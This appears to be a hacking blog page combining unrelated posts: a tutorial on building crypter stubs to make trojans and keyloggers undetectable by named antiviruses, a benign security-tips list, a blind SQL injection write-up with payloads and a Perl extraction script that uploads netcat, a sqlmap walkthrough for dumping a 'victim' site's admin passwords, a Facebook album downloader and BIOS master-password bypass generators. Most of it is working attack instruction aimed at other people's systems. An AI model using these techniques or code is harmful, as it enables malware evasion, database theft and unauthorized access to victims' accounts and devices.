Pages

Monday, February 26, 2018

Create your own FUD trojan Stub

So, some crypters and viruses are now detected as hacktools by antiviruses and are of no use now. Bunn has created Fly Crypter which has unique stub generator. So, you can create your own stub and so your crypter becomes your own private version crypter because you can assign and use new stubs to viruses and thus helping your virus program to remain FUD.

How to make Virus undetectable:

Usually, Viruses are detected because their stubs are detected as viruses by AVs. So, if you change stub of viruses, most of times, they become undetectable to antiviruses. So, I am explaining you how to create your own stub and how to use this your self-created stub to make your virus FUD (Fully UnDetecatable) to antiviruses. This Crypter is tested by me and found working well on Windows XP and Windows Vista.

1. Free Download Fly Crypter + Unique Stub Generator software.


2. Run AUSG.exe file on your computer to see:
Make virus trojan FUD
Make virus trojan FUD

3. Select "Str. Encr." and "Stub Encryption" options as I have selected above. Now, hit on "Generate my Stub". Allow some time for AUSG.exe to generate stub for you. After sometime, you'll get a confirmation message.

4. Now, hit on "Compile my stub" and you'll again get message like this:
Compile stub
Compile stub

Note: If you get error messages over here, repeat from Step 2 using "Random Passwords length" value less than 5.

5. Now, move on to directory containing Fly Crypter and AUSG.exe file. You will now see around 4 or 5 random string newly created files. One of those files is your newly created FUD Stub. Let this be "XlbAtKQ.exe".

6. Now, open Fly Crypter.exe. Create Apocalypse server and simply drag and drop this server on Fly Crypter.



7. Right click on server.exe, select Main Options -> Custom Stub and new popup box will be displayed.
How to make your own stub
How to make your own stub

Now, browse to your newly created stub "XlbAtKQ.exe" and hit OK. Select any password level and hit OK.

8. Again Right Click -> Crypt files and enter the name and path where you wanna save the newly created crypted virus file.

9. Now, you have your crypted file ready to hack passwords and access pc remotely for you. Go to novirsthanks.org and scan your stub and crypted file. You will find the detection rate decreased significantly.

Note 1: For AUSG.exe to compile your stub, you should have Microsoft Visual basic 6 installed on your computer.

Note 2: If you aren't getting FUD stub, just select the antiviruses you wanna bypass. Now, create stubs and start scanning them at novirusthanks.org. This method is used to collect and group stubs undetectable by specific antiviruses. Here is one stub which is not detected by most famous AVs as today's scanner results indicate:
- Avira
- AVG
- Avast
- Bit Defender
- Kaspersky
- Quick Heal
- Panda

Free Download this Stub over
Password: techotips.blogspot.com

Update: This method is not working 100%. As some of the readers have reported this to be not working with many keyloggers like Ardamax keylogger, General keylogger and so. (Thanks George, Riya and Central2000 for your valuable feedback). So friends, try this out with your server whether if this works and please mention your feedback. If this is not working for you, try out crypter softwares.

Develop your own stubs. Now, all resides on you to make your trojans and viruses undetectable, since you are now able to develop your own stubs.

So friends, I hope this tutorial on how to make your own stubs to make your virus trojan undetectable by antiviruses will be helpful to you. If you have any problem in using Fly Crypter and AUSG.exe files to make your own stubs, please mention it in comments.

Enjoy and make your trojans undetectable...

8 Keys to Internet Security

Much more important thing is that which antivirus program you use (or anti-spyware, or firewall, or any security software), or even if you use one at all, are the practices that make up your online behavior. People who do risky stuff on the Internet will get a virus, sooner or later, regardless of how good their security software is. On the other hand, many security experts don’t use any antivirus software and still manage to avoid viruses.
I don’t recommend that you follow in the footsteps of the security experts – the nature of their calling demands a kind of paranoia that few of us can maintain. I recommend a solid package of security software (I run Cloud Antivirus and Windows Defender) but only as a safety net – something to pick up the slack when we make mistakes, not a first line of defense.
The thing with security, online or anywhere else, is that it’s always a trade-off between protection and convenience. I can tell you how to absolutely avoid any risk of computer virus, spyware, or trojan: stay offline and never install anything or use any removable storage media. That’s 100% perfect protection, but it would severely hinder your computer usage. It’s like securing a house: You could build a door-less, window-less titanium-sheathed reinforced-concrete bunker around your house and be absolutely sure burglars couldn’t get in, but you probably wouldn’t want to live there.
The tips below are sufficient to account for all but the most determined attacks against your computer. No amount of software or behavioral change can protect you from every possible attack (if the NSA wants to get on your PC, they are probably going to do so) but you can protect yourself from virtually all of the attacks you’re likely to face online.
I owe thanks for most of these tips to Leo Laporte and Steve Gibson, hosts of the TWiT netcast Security Now. If you’re interested in computer security at a very deep level, this weekly show is your ticket, and I heartily recommend it!

1. Use a router.

The very nature of the way routers works acts as an effective hardware firewall, preventing access to computers on your home network from outside the network. Put simply, when you request something from the Internet – say, you click a link, check your email, or enter a URL – the router notes which computer on its network the request came from so it can send the reply to the proper recipient. If a would be intruder attempts to enter your network, the router checks its list of outgoing requests and, if none is found correlating to the attackers’ IP address, it ignores it. It basically doesn’t know which computer to send it to, so it throws it out.
If you simply cannot use a hardware router, make sure your operating system’s firewall is turned on. This is almost, but not entirely, as good.

2. Do not open email attachments.

I know, who doesn’t want to see pictures of Anna Kournikova naked, right? Email attachments are a major vector for infecting computers, because it’s so easy to fake the sender so the email looks like it came from someone you know, and everybody loves opening attachments from people they know. It could be a funny picture of penguins, after all. But bottom line, don’t open attachments. If your email client automatically opens or previews them, turn that feature off. Even if it’s from your mom, and even if your mom says she opened it and it’s fine, still don’t open it. (By the way, next time you’re at mom’s, reinstall Windows. She’s got tons of viruses now.)
Now, I know that sometimes you have to open attachments, so here’s a simple test to know when it is most likely safe to open an attachment:
  1. You know that the email is from the person it says it’s from. That usually means that either they said they were sending it, or they’ve written a note that only they could have written.
  2. You are expecting an attachment from that person.
  3. You know the person who created the file.
  4. There is a compelling reason to open the attachment. I’m sorry, ma, but a good laugh isn’t enough to get me to risk my computer’s security.
If you can’t be absolutely, 100% sure on all these counts, trash it. 

3. Do not download bittorrent files.

That sucks, I know, but since you’re never absolutely sure where the file comes from, where it’s been, or who might have altered it, bittorrent is risky. Downloading a Linux distribution from Ubuntu is probably ok; downloading it from Pirate’s Bay is a bit dodgy. Downloading Oscar screeners of movies that haven’t been released yet is super-duper dodgy. It’s a real shame to have to forego sticking it to The Man because of practical concerns, but you’re taking a big risk downloading an unknown file from an unknown person about whom the only thing you know is that they don’t feel any compunctions about breaking the law. 

4. Do not download warez, porn, or other dubious files.

First they came for my bittorrents, then they came for my porn! It just gets worse and worse, doesn’t it. But really, think about it – people who distribute illegal copies of illegally hacked software a) are demonstrated lawbreakers, b) are familiar with programming code, and c) had access to the code you’re expecting to install on your computer. As for porn, while I’m sure there are plenty of Good Samaritans out there who distribute free pornography simply out of a desire for greater happiness in the world, some small number of them do it for financial gain. If they’re giving you free porn, they must be making money off you another way, and one of the easiest is to install a bunch of malware on your computer, run whatever code they want on it, and then sell the use of your computer to spammers, phishers, and other unsavory sorts. You want to know how bad these guys are? They don’t even care if they give pornography a bad name!

5. Do not download *anything* from sites you’re unfamiliar with.

Again, if you’re intending to install something you’ve downloaded onto your computer, you have to know that only people you trust have had access to it. Adobe, Microsoft, and other software manufacturers are generally trustworthy, as are sites like C|net’s Download.com. “Bob’s Free Software I Like a Whole Bunch” might not be quite as safe a bet.

6. Turn off Flash, Javascript, and other browser plugins.

Flash ads have been used to install viruses. So has Javascript code. You don’t have to do anything to get infected this way; you just visit a site with the malicious code on it and *bam*, you’re infected. Because of that, hardcore security folks turn off Javascript and either block or never install Flash. Personally, I think it limits the usefulness of the Internet too much; I’ve decided to risk running Javascript, and use the FlashBlock plugin in Firefox so I can select which Flash objects on a page I want to run (allowing me, for instance, to watch YouTube videos while preventing Flash ads on the same page from loading).

7. Do not click links in email.

It’s very easy to hide the real destination of links sent in email by using HTML where the text reads “www.perfectlysafesiteyouknowandtrust.com” but the actual URL is “www.reallybadsiterunbymeanpeoplewithnofriends.net”. This is how phishing scams work – you think you’re going to PayPal or your bank, but really you’re going to a page designed to look just like your bank’s login page but hosted on the mean people’s server. Also, bad guys often put unique tracking IDs into links, so that they know exactly who clicked on a link – which means that they know which email addresses out of the millions they sent spam to are valid, which makes them worth more money to other spammers. Um, yay?

7a. Do not click shortened URLs.

I don’t like this one, because I like Twitter and you lose a lot of functionality if you don’t use a service like bit.ly or is.gd to shorten URLs, but these links are scary. When you hover your mouse over a link, the URL appears in the email or browser’s status bar, meaning you can verify that the link heads to where it says it does. When you do the same with a shortened URL, it just says the shortened URL. There are Firefox extensions like UnTiny that will reveal the true destination of shortened URLs, and some Twitter clients do as well, but until a universal solution is standardized, these URLs remain a bit scary, security-wise.

8. Install all security updates.

Unless you’re a multi-national mega-corporation running oodles of mission-critical custom-designed software, you need to install security updates as quickly as possible upon release. If remembering to do this isn’t something you think you’d be likely to do, set your computer to automatically download and install updates. Increasingly, we’re seeing “0-day” exploits – viruses and trojans written to make use of security flaws before those flaws are corrected by – or, in some cases, even known to – manufacturers. Keeping up-to-date is essential to keep even marginally safe.
I know that, the world being what it is, someone will be thinking right about now, “Hey, why don’t you just switch to Mac OS X or Linux?” It’s true, those operating systems get far fewer viruses and other problems than Windows PCs, but most experts seem to agree that this is at least in part because there are so many Windows PCs and so few Mac and Linux PCs. (There are plenty of Linux servers, but those are under professional supervision, which goes a long way towards making up for any security weaknesses Linux has.) Bad guys program for the system that allows the greatest spread of their malware, and right now, that’s Windows.
But if you’re still not convinced, I’ve got an even better idea for you. Both Mac OS X and Linux have demonstrated security vulnerabilities, and as they become more common are likely to become targets for hackers. So they’re not really safe bets. Instead, try BeOS! It may be riddled with security holes and only run on Pentium 4 and earlier PCs, but I can guarantee you, nobody is writing viruses for it!
For everyone else, whether you use Windows, Mac, or Linux, make sure to follow the rules above and, chances are, you’ll be just fine.

Time Based Blind SQL Injection

Bug Hunting:

When I put the famous single quote in front of the form I got the well known message:

Microsoft OLE DB Provider for SQL Server
error '80040e14'
Unclosed quotation mark before the character string '''.
Then, without any extra parsing to above error response, I started inserting the common ways of exploitation:
  • '+OR+'1'='1
  • '+OR+1=1--
  • '+having+1=1--
  • '+union (select 1 from table)--
  • etc
The first thing I noticed is that the spaces were being filtered but as explained in my previous SQLi post, you can easily bypass that by injecting a TAB (%09) instead of a space.

After bypassing the space restriction, I always got syntax errors like:

Incorrect syntax near the keyword 'OR'.

Incorrect syntax near the keyword 'having'.

Incorrect syntax near the keyword 'union'.
Which was telling me two things: first, my SQLi was being executed but with syntax errors and second that I was not in the common scenario where the injection is being placed after the WHERE clause:

select ..... where user='aa' OR 1=1
After a lot of testing without success, I just assumed I cannot inject any SQL command after the single quote, so, then I started inserting other chars like: ',' and... I got below error:

Procedure or function get_Etiqueta has too many arguments specified.
Then I realized we were dealing with a Stored Procedure which in fact was injectable, this could explain the restrictions and therefore the syntax error messages. Then I decide a new way of injection (below is the value inserted in the vulnerable POST parameter):

';<my_own_sql_query>;--
Above injection is saying, complete the current request, execute my own SQL command, and comment out the rest of the string.

When executed using fake table and field:

'; select xxx from table tabla'--
I did not get any error, just redirected back to main Login page. Then I realized we were not getting any responses from the DB and therefore in a Blind SQL Injection scenario, so I decided to use the famous WAITEFOR DELAY command from MSSQL to validate if my attempts were being executed in the server side, so I sent:

0';WAITFOR%09DELAY%09'0:0:15'
And voila!!! The browser waits 15 seconds to get the response from the Server!! Now we have identified the BUG, so, how can we exploit it? Let's go to the next section.

Exploit from Scratch.

I decided to use sqlmap or sqlninja to dump the database or to get a remote shell, but none works for me, just for one reason, those tools have their own methods to bypass filters, but unfortunately, the TAB (%09) trick is not handled by them and therefore all my injections were being rejected. It was a mess to adjust their tools so I decided to keep improving my own tools and come up with Regalado-blindSQL.pl perl script.

The main features of the tool are as follows:
  • Create a SQL procedure to assign the SQL query result to a variable.
  • The tool, iterates to each char from the result and compare it with the ASCII table to identify its value, if the value is found, the response will be delay by 10 seconds, this way the tool can identify if a char was identified.
  • Write output to a log file.
  • Implements netcat upload feature from Sqlninja tool, just changing the bypass technique and the Libraries used to established the SSL Connection.
Below the script to identify the chars in the response:

1. my $cmd = " declare \@s varchar(100) select TOP 1 \@s = $sql" .
2. " if (ascii(substring(\@s,$j,1))) =". $i ." waitfor delay '0:0:10' " .
3. " else waitfor delay '0:0:1'";

At Line 1, we create the variable @s and assign it the result of the $sql being executed.
At Line 2, the first char (denoted by $j) is subtracted from the string acquired and compare with the first value in the ASCII Table ($i).
This loops will repeat until the char is found and then $j will be incremented to move to the next char in the string.

The main loop to get the string, parse each char and compare it with ASCII TABLE is here:

while (length ($dato) > 0){ #Keep searching until no more data found
$dato ="";
for $j (1 .. 100){#This is the maximum text length to retrieve, although the tool knows when the string is complete
print "\t\nIdentificando char number: $j\n";
open (FILE,">>", "output.txt") or die $!; #Creating log file
for $i (32 .. 126){ #ASCII TABLE Printable chars only
$g = $i;
print "\t\nValidating if the letter exist: " . chr($i) . "\n";
my $cmd = " declare \@s varchar(100) select TOP 1 \@s = $sql" .
" if (ascii(substring(\@s,$j,1))) =". $i ." waitfor delay '0:0:10' " .
" else waitfor delay '0:0:1'";

send_request($prefix . $cmd . $postfix); #Send HTTPS request
if (check_time() eq "encontrado") { #validates the response to know if the car was detected.
last;
}
}

if ($r eq "encontrado"){
print "\t\nGetting Contenido ... " . $dato . "\n";
print FILE "Getting Contenido ...: " . $dato . "\n";
close(FILE);
}
else{ #No encontro ningun caracter y esto puede significr el fin de la palabra identificada

print "\t\n*********END OF CONTENT EXTRACTTION ... Moving to next one.\n";
last;
}
}
print "\t\n****************Content FOUND: " . $dato . " for table/field: $tb/$fi******************\n";
print FILE "\n****************Content FOUND: " . $dato . " for table/field: $tb/$fi****************\n";

$sql = $sql . " and $fi not like '". $dato . "'"; #preparing the next string to retrieve.
}
print "\t\nEND OF EXECUTION check output.txt log file.\n\n";

Finally, the tools is able to identify:
  • DB Name
  • DB User
  • DB Version
  • List of tables from current DB
  • List of fields from specific table
  • Content of tables
  • Upload netcat via sqlninja methods.
IMPORTANT: The tool DOES NOT FIND vulnerabilities, it assumes you already found one and need to leverage the exploitation. Being this said, you might need to change the $prefix and $postfix variables within the tool to adjust based on the way your application is exploitable.


Download All Photos, Images Inside Facebook Albums Easily in Firefox

FacePAD (Facebook Photo Album Downloader) allows you to download entire Facebook albums with a click of a button. FacePAD, better known as the Facebook Photo Album Downloader will allow you to download your friends’ entire Facebook albums with a click of a button. FacePAD is also compatible with all languages that are compatible with Facebook.

SETUP/PREFERENCES
1) Make sure that THIRD PARTY COOKIES are ENABLED in Firefox’s Options/Preferences (under the Privacy tab).

DOWNLOADS ALBUMS (FRIEND’S, FAN PAGE)
(1) To download photos from a friend’s/fan page album, right-click (with your mouse) on the name/link of the Facebook album of interest and click the DOWNLOAD ALBUM WITH FACEPAD option.
(2) A window will pop-up asking you to choose a directory/folder where you would like the photos to be stored.
(3) The photos will then be downloaded and renamed in sequential, ascending order, where the order is determined by the age of the photo.

DOWNLOADS ALBUMS (GROUP, EVENT)
(1)To download photos from the group/event album, click on the photo tab in said group/event. At the top, where it says SEE ALL PHOTOS, right-click (with your mouse) on this link and click DOWNLOAD ALBUM WITH FACEPAD option.
(2) A window will pop-up asking you to choose a directory/folder where you would like the photos to be stored.
(3) The photos will then be downloaded and renamed in sequential, ascending order, where the order is determined by the age of the photo.

Hack website using Backtrack (sqlmap)

I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool.

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminalsql map 1
2. Now find the vulnerable site. (well I already have vulnerable site)
sql map 2
3. Now type this command in the terminal and hit enter.(refer above figure)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs

4. Now you will get the database name of the website
sql map 3
Well I got the two database aj and information_schema we will select aj database.

5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.
python sqlmap.py -u http://yourvictim'slink/ index. php?id=4 -D (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
sql map 4
7. Now you will get the tables list which is stored in aj database.
sql map 5
8. Now lets grab the columns from the admin table
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
sql map 7
Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Now we got the username and the password of the website !
sql map 9
Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.

BIOS Password Backdoors in Laptops

Synopsis: The mechanics of BIOS password locks present in current generation laptops are briefly outlined. Trivial mechanisms have been put in place by most vendors to bypass such passwords, rendering the protection void. A set of master password generators and hands-on instructions are given to disable BIOS passwords.

When a laptop is locked with password, a checksum of that password is stored to a so-called FlashROM - this is a chip on the mainboard of the device which also contains the BIOS code and other settings, e.g. memory timings.

For most brands, this checksum is displayed after entering an invalid password for the third time:

The dramatic 'System Disabled' message is just scare tactics: when you remove all power from the laptop and reboot it, it will work just as before. From such a checksum (also called "hash"), valid passwords can be found by means of brute-forcing.

The bypass mechanisms of other vendors work by showing a number to the user from which a master password can be derived. This password is usually a sequence of numbers generated randomly.

Some vendors resort to storing the password in plain text onto the FlashROM, and instead of printing out just a checksum, an encrypted version of the password is shown.

Other vendors just derive the master password from the serial number. Either way, my scripts can be used to get valid passwords.

A few vendors have implemented obfuscation measures to hide the hash from the end user - for instance, some FSI laptops require you to enter three special passwords for the hash to show up (e.g. "3hqgo3 jqw534 0qww294e", "enable master password" shifted one up/left on the keyboard). Some HP/Compaq laptops only show the hash if the F2 or F12 key has been pressed prior to entering an invalid password for the last time.

Depending on the "format" of the number code/hash (e.g. whether only numbers or both numbers and letters are used, whether it contains dashes, etc.), you need to choose the right script - it is mostly just a matter of trying all of them and finding the one that fits your laptop. It does not matter on what machine the script are executed, i.e. there is no reason to run them on the locked laptop.
This is an overview of the algorithms that I looked at so far:

VendorHash EncodingExample of Hash Code/SerialScripts
Compaq5 decimal digits12345pwgen-5dec.py
Windows binary
Dellserial number1234567-595B
1234567-D35B
1234567-2A7B

Windows binary&source
Fujitsu-Siemens5 decimal digits12345pwgen-5dec.py
Windows binary
Fujitsu-Siemens8 hexadecimal digitsDEADBEEFpwgen-fsi-hex.py
Windows binary
Fujitsu-Siemens5x4 hexadecimal digitsAAAA-BBBB-CCCC-DEAD-BEEFpwgen-fsi-hex.py
Windows binary
Fujitsu-Siemens5x4 decimal digits1234-4321-1234-4321-1234pwgen-fsi-5x4dec.py
Windows binary
Hewlett-Packard5 decimal digits12345pwgen-5dec.py
Windows binary
Hewlett-Packard/Compaq Netbooks10 charactersCNU1234ABCpwgen-hpmini.py
Windows binary
Insyde H20 (generic)8 decimal digits03133610pwgen-insyde.py
Windows binary
Phoenix (generic)5 decimal digits12345pwgen-5dec.py
Windows binary
Sony7 digit serial number1234567pwgen-sony-serial.py
Windows binary
Samsung12 hexadecimal digits07088120410C0000pwgen-samsung.py
Windows binary


The .NET runtime libraries are required for running the Windows binary files (extension .exe). If the binary files (.exe) don't work out for you, install Python 2.6 (not 3.x) and run the .py script directly by double-clicking them. Make sure that you correctly read each letter (e.g. number '1' vs letter 'l').

Вячеслав Бачериков has also converted my scripts to javascript so you can calculate the passwords with your browser: http://bios-pw.org.ua/ (sources).

Please leave a comment below on what make/model the scripts work. Also, be aware that some vendors use different schemes for master passwords that require hardware to be reset - among them are e.g. IBM/Lenovo. If you find that your laptop does not display a hash or the scripts do not work for you for whatever reason, try to:
  • use a USB keyboard for entering the password for avoiding potential defects of the built-in keyboard,
  • run CmosPwd to remove the password if you can still boot the machine,
  • overwrite the BIOS using the emergency recovery procedures. Usually, the emergency flash code is activated by pressing a certain key combination while powering on the machine. You also need a specially prepared USB memory stick containing the BIOS binary. The details are very much dependent on your particular model. Also, be aware that this can potentially brick your device and should only be done as a last measure.
  • Some dell service tags are missing the suffix - just try the passwords for all suffices by adding -595B, -2AB7 and -D35B to your service tags.
  • The passwords for some HP laptops are breakable with this script.
  • Unlocking methods for some Toshiba laptops are described here.
  • Some older laptop models have service manuals that specify a location of a jumper / solder bridge that can be set for removing the password.

If none of the above methods work, please use the vendor support. Please understand that my motivation for reverse-engineering comes from a personal interest - I will not accept offers to look at the specifics of certain models.

Related Posts Plugin for WordPress, Blogger...